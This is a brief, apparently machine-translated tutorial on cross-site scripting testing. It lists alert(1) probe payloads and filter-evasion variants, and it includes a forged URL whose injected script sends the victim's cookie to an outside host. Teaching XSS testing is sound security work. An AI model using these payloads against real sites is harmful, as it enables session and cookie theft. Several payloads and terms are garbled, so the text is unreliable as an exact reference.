Security Testing - Cross-Site Scripting Attack (xss)

Cross-site scripting is a relatively important and common security vulnerability in security. Cross-site scripting refers to the input of malicious code. If the program does not verify the input and output, the browser will be controlled by the attacker. User cookies, system, and browser information can be obtained, and saved xss can also be used for phishing to obtain more user information. The most common method of cross-site scripting, enter <Script>alert(1)</script> and its various variants<script>alert(1) </script> entity %3Cscript%3Ealert(1 %3C/script%3E URL encoding <scr<script>ipt>alert(1)<scr<script>ipt><script x=1>alert(1)</script x=1> Write this way or <script>confirm(1)</script><javascript.:alert(1)>; etc. If the page pops up after the submission, the page has an xss vulnerability *reflective xss popular Speaking, even if you enter a piece of code, you can see the actual effect of the code, not the effect of the original program: a piece of code <html><body><script>document.write(location.search);</Script>//location.search returns the url? The beginning part of </body></html> when entering the following url"http://127.0.0.1/attrck.html?search=222" page will display: ?search =222 ; but if you enter /?search=<Script>alert(1)</script> in the url, the actual code of the page is: document.write(?search=)<Script>alert (1) </script>; will pop up a warning box, ie the code <Script>alert(1)</script> is executed, not the page is originally displayed? The effect of the post string can use the forged url To get the user cookie, for example, add document.cookie=("name=123"); in example 1, set the cookie, and then construct the url as follows to implement the localhost domain cookie to be passed and search http://127.0.0.1 /attrck.html?search=<script>window.open("http://www.baidu.com/s?wd="+document.cookie )</script>Because cookies are forbidden to cross-domain access , but forged url, the browser will think it is still the domain of localhost * Saved xss means to save malicious code to the server, such as publishing a malicious code, other users will execute malicious scripts when browsing * dom based xss Strictly speaking, the xss is also reflective. The example in this article is also dom based, which refers to modifying the dom object model of the page to achieve an attack. For example, the page uses the dom method such as document.write\\document.writeln\\innerhtml. Dom based xss, find xss vulnerability one General use of manual input, need to take into account input restrictions, filtering, length restrictions and other factors, so you need to design a variety of variable input to achieve the test results, you can also use tools, such as burstisuite to obtain the request and manually modify the request parameters, Then resubmit to the browser to test, because xss is not limited to visible page input, and may be hidden form fields, get request parameters, and so on. This article comes from [System Home] www.xp85.com